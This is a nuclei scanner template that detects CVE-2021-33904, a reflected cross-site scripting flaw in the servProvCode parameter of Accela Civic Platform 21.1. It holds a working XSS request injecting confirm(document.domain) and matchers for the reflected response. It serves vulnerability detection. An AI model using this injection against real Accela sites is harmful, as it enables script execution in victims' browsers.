nuclei-templates/cves/2021/CVE-2021-33904.yaml

39 lines
1.1 KiB
YAML

id: CVE-2021-33904
info:
name: Accela Civic Platform 21.1 - 'servProvCode' XSS
author: geeknik
severity: medium
description: In Accela Civic Platform through 21.1, the security/hostSignon.do parameter servProvCode is vulnerable to XSS.
reference:
- https://www.exploit-db.com/exploits/49980
- https://gist.github.com/0xx7/3d934939d7122fe23db11bc48eda9d21
- http://packetstormsecurity.com/files/163093/Accela-Civic-Platorm-21.1-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-33904
cwe-id: CWE-79
tags: cve,cve2021,accela,xss
requests:
- method: GET
path:
- "{{BaseURL}}/security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
words:
- '"k3woq"^confirm(document.domain)^"a2pbrnzx5a9"'
- 'servProvCode'
condition: and
- type: status
status:
- 200